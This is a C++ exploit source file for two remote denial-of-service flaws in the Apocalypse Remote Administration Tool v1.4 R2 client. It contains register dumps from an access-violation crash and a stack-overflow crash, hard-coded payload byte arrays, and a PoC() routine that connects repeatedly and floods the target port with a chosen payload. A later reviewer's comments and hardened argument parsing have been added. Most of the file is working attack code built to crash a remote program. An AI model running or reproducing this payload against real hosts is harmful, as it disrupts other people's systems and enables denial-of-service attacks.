/* Apocalypse Remote Administration Tool v1.4 R2 multiple remote denial of service vulnerabilities
* Author: Kevin R.V <[email protected]>
* Date: 2011
* License: Totally free 8-)
*
* */
/*
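Crash 1 (vuln type 0): access violation when the client tries to write to address 0x000003F4.
EAX, ECX, EDX and ESI are all zero and the target address is small, which is consistent with a write through a null base pointer plus a field offset.
Register state at the fault: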
EAX 00000000
ECX 00000000
EDX 00000000
EBX 02E6CC88
ESP 00103ED0
EBP 00103F04
ESI 00000000
EDI 00458CA4 Client.00458CA4
EIP 00509AB5 Client.00509AB5
C 0 ES 0023 32bit 0(FFFFFFFF)
P 1 CS 001B 32bit 0(FFFFFFFF)
A 0 SS 0023 32bit 0(FFFFFFFF)
Z 1 DS 0023 32bit 0(FFFFFFFF)
S 0 FS 003B 32bit 7FFDE000(FFF)
T 0 GS 0000 NULL
D 0
O 0 LastErr ERROR_SUCCESS (00000000)
EFL 00010246 (NO,NB,E,BE,NS,PE,GE,LE)
MM0 0.0, 1.121039e-44
MM1 +NAN 7FFDE6F4, 8.506428e+33
MM2 -9.846953e+26, -6.258335e+15
MM3 -8.745139e+07, 0.005859086
MM4 -2.466859e-33, -6.343342e-15
MM5 -1.084202e-19, 0.0
MM6 -2.466859e-33, -6.343342e-15
MM7 0.0, 0.0 */
/*
Crash 2 (vuln type 1): stack overflow.
Register state at the fault:
EAX 034D1694
ECX 00498E00 Client.00498E00
EDX 00000690
EBX 034D1694
ESP 0003251C
EBP 00033518
ESI 021901D1
EDI 000335D8
EIP 0049A3DD Client.0049A3DD
C 1 ES 0023 32bit 0(FFFFFFFF)
P 0 CS 001B 32bit 0(FFFFFFFF)
A 0 SS 0023 32bit 0(FFFFFFFF)
Z 0 DS 0023 32bit 0(FFFFFFFF)
S 0 FS 003B 32bit 7FFDE000(FFF)
T 0 GS 0000 NULL
D 0
O 0 LastErr ERROR_SUCCESS (00000000)
EFL 00010203 (NO,B,NE,BE,NS,PO,GE,G)
MM0 0.0, 1.121039e-44
MM1 +NAN 7FFDE6F4, 8.506428e+33
MM2 -1.570600e-32, 5.571002e-41
MM3 -1.196440, -1.191965
MM4 -0.008783944, -1.009549
MM5 5.791298e-39, 0.0
MM6 -5.082198e-21, 0.0
MM7 -7.754818e-26, 0.0 */
#include <cstdlib>
#include <cstring>
#include <iostream>
#include <winsock2.h>
// Tool version string. main() appends it to the banner through adjacent
// string-literal concatenation, so it has to remain a macro that expands to a literal.
#define VERS "0.1"
// Set to 1 by PoC() after any successful connect(), and read there again when a
// later connect() fails, to pick one of the two final messages.
// As a namespace-scope int it starts at zero.
int connected;
using namespace std;
// Payload PoC() sends when vuln == 0 (the "Access violation" entry in the usage text).
// The first four bytes are ASCII "367|"; the next two, 0x78 0x01, match a zlib
// stream header, so the rest is presumably a compressed message body behind a
// text prefix -- nothing else on this page confirms the framing.
// NOTE(review): many values exceed 0x7F. Where plain char is signed, this
// initialiser is a narrowing conversion, which is ill-formed since C++11; an
// unsigned char array, cast at the send call, would be the portable form.
char Access_violation[] =
{
0x33,0x36,0x37,0x7C,0x78,0x01,0x8D,0x50,0xCD,0x4A,0xC3,0x40,0x10,
0x0E,0x7A,0xE8,0xC5,0xBB,0x47,0x17,0x4F,0xF6,0x90,0xB2,0xBB,0x4D,
0x93,0xD6,0x5B,0x7F,0xA2,0xF4,0x90,0x52,0x48,0x40, 0xC1,0x88,0x2C,0x49,
0x1A,0x57,0xD2,0xDD,0x92,0x4D,0x51,0x61,0xEF,0xBE,0x40,0x5F,0x40,
0xF0,0x15,0x04,0x8F,0xDE,0xF5,0xE6,0x13,0x14,0xBC,0x2A,0x82,0x07,
0xC1,0x93,0x13,0x2C,0xD8,0x43,0x85,0x7E,0xC3,0x0C,0xDF,0xCC,0xCE,
0xCC,0xCE,0x4C,0x87,0xA5,0x19,0x13,0x9A,0x4D,0x64,0xC4,0xB2,0xEB,
0x89,0x4A,0x80,0xE2,0x05,0x3D,0x6B,0x58,0xDD,0x0E,0xC6,0x2D,0x4B,
0x07,0x89,0x2A,0xB8,0x48,0xCD,0x61,0xA4,0x03,0xD7,0x0F,0xFA,0x83,
0x43,0xB3,0x6D,0xB7,0x5D,0x52,0xEF,0x68,0x42,0x9D,0x1A,0x06,0x21,
0x7A,0x20,0x0B,0xD4,0x17,0xAA,0x60,0x59,0x96,0xC4,0x9A,0xD4,0xAC,
0x9A,0x85,0x3A,0xD3,0x14,0x1D,0xF0,0x2B,0xF0,0xA9,0x8D,0xB5,0x3F,
0x61,0x5C,0x94,0x56,0x70,0x75,0xAE,0xDB,0xF1,0x98,0x03,0x29,0x72,
0x56,0xC8,0x5C,0x53,0xD2,0x22,0xDA,0x78,0xFC,0xDA,0x31,0x00,0xFA,
0x88,0x8B,0x58,0x5E,0x2A,0x74,0x3C,0x44,0x7B,0xC3,0x5C,0x8E,0x12,
0xA5,0xB8,0x14,0x2C,0xAB,0x6A,0x0C,0xD2,0xDD,0x0F,0x4B,0xED,0xC9,
0x68,0x3A,0x4E,0x44,0xA1,0x10,0x13,0x31,0xF2,0x93,0xA2,0x9C,0x51,
0x85,0x7F,0xC3,0x86,0xAE,0x8A,0x72,0x0E,0xDD,0xB9,0x5C,0xB3,0xC0,
0xE3,0x0A,0xC5,0x8B,0xB6,0x52,0xAD,0x59,0xD4,0x95,0x62,0xC4,0xD3,
0x69,0xCE,0x22,0xFE,0x29,0x50,0x56,0x5E,0x32,0xEC,0xC1,0x52,0xD0,
0x2A,0x41,0x93,0x5C,0xA6,0x39,0x1B,0xB3,0x50,0xBB,0xFE,0xD2,0x6D,
0xF5,0x1D,0xAC,0x59,0xEA,0x26,0x68,0xA3,0x41,0x1D,0xCB,0xB4,0x2D,
0x6C,0x62,0xBB,0x45,0x5B,0x4D,0x62,0xD2,0x3A,0x26,0x96,0x51,0x83,
0xB7,0x36,0xA5,0x26,0x06,0x10,0xE0,0x25,0xE2,0x53,0xEF,0xF9,0xFB,
0x63,0x6B,0x77,0x56,0xAD,0xBC,0xBF,0x94,0x09,0x00,0xF7,0x66,0xEE,
0xDD,0xDF,0x56,0x7E,0x9D,0x15,0xD6,0xB1,0x9B,0xD8,0x59,0xC4,0x1F,
0xE0,0xC3,0x99,0xF1,0x14,0x18,0x1B,0x86,0x41,0xE9,0x8A,0xE4,0xA5,
0xD0,0xC9,0xC5,0xEB,0xDB,0x36,0xF8,0xFF,0xCC,0xE7,0x8D,0xE7,0x9E,
0xFE,0x01,0xF0,0xF2,0xA8,0x97
};
// Payload PoC() sends when vuln != 0 (the "Stack overflow" entry in the usage text).
// It is 26 bytes long and matches the first 26 bytes of Access_violation except
// for the twelfth byte, which is 0x00 here and 0x40 there.
// NOTE(review): values above 0x7F in a plain char array are a narrowing
// conversion where char is signed (ill-formed since C++11).
char stack[] =
{
0x33,0x36,0x37,0x7C,0x78,0x01,0x8D,0x50,0xCD,0x4A,0xC3,0x00,0x10,
0x0E,0x7A,0xE8,0xC5,0xBB,0x47,0x17,0x4F,0xF6,0x90,0xB2,0xBB,0x4D,
};
/*
 * Connects to host:port over TCP and, on success, writes the selected payload
 * 99 times, then calls itself to connect again. The recursion ends only when
 * connect() fails.
 *
 * host  IPv4 address string handed to inet_addr()
 * port  TCP port, converted with htons()
 * vuln  0 selects Access_violation, any other value selects stack
 *
 * What this looks like on the wire: repeated TCP connections from one source
 * to the same port, each carrying up to 99 copies of one fixed payload.
 *
 * The final message is an inference, not a measurement. A failed connect()
 * after an earlier success is reported as a crash, although a closed listener,
 * a firewall reset or a connection limit would look the same from here.
 *
 * NOTE(review): defects present in the listing as published --
 *  - the function is declared int but no path returns a value, which is
 *    undefined behaviour in C++;
 *  - WSAStartup() runs on every call with no WSACleanup(), and the socket is
 *    never closed, so every level of recursion keeps a handle open;
 *  - the results of WSAStartup(), socket() and sendto() are never checked;
 *  - the recursion depth is unbounded for as long as the peer keeps accepting.
 */
int PoC(char * host, unsigned int port, unsigned int vuln)
{
WSADATA wsa;
WSAStartup(MAKEWORD(2,0),&wsa);
SOCKET sock;
struct sockaddr_in local;
sock=socket(AF_INET,SOCK_STREAM,IPPROTO_TCP);
// Despite its name, `local` holds the remote endpoint.
local.sin_family = AF_INET;
local.sin_addr.s_addr = inet_addr(host);
local.sin_port = htons(port);
if (connect(sock, (struct sockaddr *)&local, sizeof(local) ) == 0 )
{
// Remember that the peer answered at least once; the else branch below uses it.
connected = 1;
cout << ".";
for(int i = 0; i<99; i++)
{
// The socket is already connected, so Winsock ignores the address arguments
// given to sendto(); each call is a plain write on the TCP stream.
if ( vuln == 0 )
sendto(sock, Access_violation, sizeof(Access_violation), 0, (struct sockaddr *)&local,sizeof(local));
else
sendto(sock, stack, sizeof(stack), 0, (struct sockaddr *)&local,sizeof(local));
}
// Try again with a fresh socket; `sock` from this call is left open.
PoC(host, port, vuln);
}
else
{
// connect() failed: interpret that according to whether any earlier attempt succeeded.
if ( connected )
cout << endl << endl << "[+] Congrats Apocalypse crashed!" << endl;
else
cout << endl << endl << "[-] Sorry not Apocalypse detected :(" << endl;
}
}
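/*
 * Command-line entry point: prints the banner, parses -h / -p / -v and hands
 * the values to PoC().
 *
 * Argument handling is hardened relative to the published listing; the banner,
 * usage text, exit codes and the call into PoC() are unchanged.
 *  - Every option must be followed by a value. The original read argv[i + 1]
 *    unconditionally and its `argc < 6` guard let a trailing option through,
 *    so atoi() could be handed the null pointer that terminates argv.
 *  - `ip` and `port` were used uninitialised when -h or -p was absent; both
 *    are now required.
 *  - Numbers are parsed with strtol() and must be whole decimal strings in
 *    0..65535, instead of being silently wrapped into a u_short.
 *
 * Exits with -1 on a usage error and returns 1 after PoC() comes back, as the
 * original did.
 */
int main(int argc, char *argv[])
{
    cout << "\nApocalypse Remote Administration Tool v1.4 R2 multiple remote denial of service vulnerabilities" VERS << endl << endl;
    cout << "by Kevin R.V <[email protected]" << endl;

    char *ip = 0;        // stays null until -h is seen
    long port = -1;      // -1 means "-p not seen"
    long v_type = 0;     // -v stays optional and defaults to 0, as before
    bool usage_error = (argc < 6);

    for (int i = 1; !usage_error && i < argc; i++)
    {
        const bool is_host = strcmp(argv[i], "-h") == 0;
        const bool is_port = strcmp(argv[i], "-p") == 0;
        const bool is_vuln = strcmp(argv[i], "-v") == 0;
        if (!is_host && !is_port && !is_vuln)
            continue;

        // argv[argc] is a null pointer, so an option in last position has no value.
        if (i + 1 >= argc)
        {
            usage_error = true;
            break;
        }

        if (is_host)
        {
            ip = argv[i + 1];
            continue;
        }

        // Reject empty strings, trailing junk and anything a u_short cannot hold.
        char *end = 0;
        const long value = strtol(argv[i + 1], &end, 10);
        if (end == argv[i + 1] || *end != '\0' || value < 0 || value > 65535)
        {
            usage_error = true;
            break;
        }

        if (is_port)
            port = value;
        else
            v_type = value;
    }

    if (usage_error || ip == 0 || port < 0)
    {
        cout << "Usage: " << argv[0] << ".exe -h <ip> -p <port> -v <vuln type>" << endl << endl;
        cout << "vuln list : " << endl;
        cout << "0- Access violation, try to write in not allowed memory" << endl;
        cout << "1- Stack overflow" << endl;
        exit(-1);
    }

    cout << "[+] Starting exploit" << endl << endl;
    PoC(ip, static_cast<unsigned int>(port), static_cast<unsigned int>(v_type));
    return 1;
}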